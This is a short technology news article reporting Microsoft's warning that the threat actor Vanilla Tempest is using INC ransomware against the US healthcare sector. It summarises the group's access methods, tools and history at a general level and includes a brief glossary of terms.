Technology

Microsoft Warns of New Ransomware Threat in Healthcare

Lilu Anderson
By Lilu Anderson
Microsoft Warns of New Ransomware Threat in Healthcare | FinOracle
Photo: Finoracle.net

Microsoft Alerts on New INC Ransomware Threat

Microsoft, a leading technology company, has issued a warning about a new ransomware strain known as INC, which is being used by a financially motivated threat actor to attack the U.S. healthcare sector. This development signals an alarming rise in cybersecurity threats targeting critical industries.

Contents
Microsoft Alerts on New INC Ransomware ThreatWho is Behind the Attacks?Tools and Techniques UsedPrevious Activities and Known AliasesIncreasing Use of Cloud Tools for Data TheftUnderstanding Technical Terms

Who is Behind the Attacks?

The threat intelligence team at Microsoft has identified the cybercriminals behind these attacks as Vanilla Tempest, previously known as DEV-0832. This group has been linked to a series of attacks, and they operate by receiving initial access through GootLoader infections. GootLoader is a malware loader used by another actor, Storm-0494, to compromise systems.

Tools and Techniques Used

After gaining initial access, Vanilla Tempest employs a range of tools to penetrate deeper into the network. Notably, they use the Supper backdoor, a malicious tool enabling remote access, alongside legitimate software such as AnyDesk RMM (Remote Monitoring and Management) and the MEGA data synchronization tool. This combination helps them move laterally across the network using Remote Desktop Protocol (RDP) and deploy the INC ransomware payload via Windows Management Instrumentation (WMI) Provider Host.

Previous Activities and Known Aliases

Vanilla Tempest has been active since July 2022, targeting sectors like education, healthcare, IT, and manufacturing. They have used a variety of ransomware families, including BlackCat, Quantum Locker, Zeppelin, and Rhysida. Interestingly, this group is also known as Vice Society, recognized for using existing lockers rather than developing custom malware.

Increasing Use of Cloud Tools for Data Theft

There is an increasing trend among ransomware groups like BianLian and Rhysida to utilize tools such as Azure Storage Explorer and AzCopy. These are typically used for managing data in Azure cloud storage but are being repurposed for exfiltrating sensitive data from attacked networks. This tactic helps them evade detection while transferring large amounts of data to the cloud.

Understanding Technical Terms

  • Ransomware: A type of malicious software designed to block access to a computer system until a sum of money is paid.
  • Lateral movement: A technique used by attackers to move through a compromised network to gain access to other systems or data.
  • Exfiltration: The unauthorized transfer of data from a computer.

This surge in ransomware activity, especially targeting vital sectors like healthcare, highlights the urgent need for robust cybersecurity measures to protect sensitive data and prevent operational disruptions.

TAGGED:
Share This Article
Lilu Anderson
ByLilu Anderson
Lilu Anderson is a technology writer and analyst with over 12 years of experience in the tech industry. A graduate of Stanford University with a degree in Computer Science, Lilu specializes in emerging technologies, software development, and cybersecurity. Her work has been published in renowned tech publications such as Wired, TechCrunch, and Ars Technica. Lilu’s articles are known for their detailed research, clear articulation, and insightful analysis, making them valuable to readers seeking reliable and up-to-date information on technology trends. She actively stays abreast of the latest advancements and regularly participates in industry conferences and tech meetups. With a strong reputation for expertise, authoritativeness, and trustworthiness, Lilu Anderson continues to deliver high-quality content that helps readers understand and navigate the fast-paced world of technology.

Related Stories

Uncover the stories that related to the post!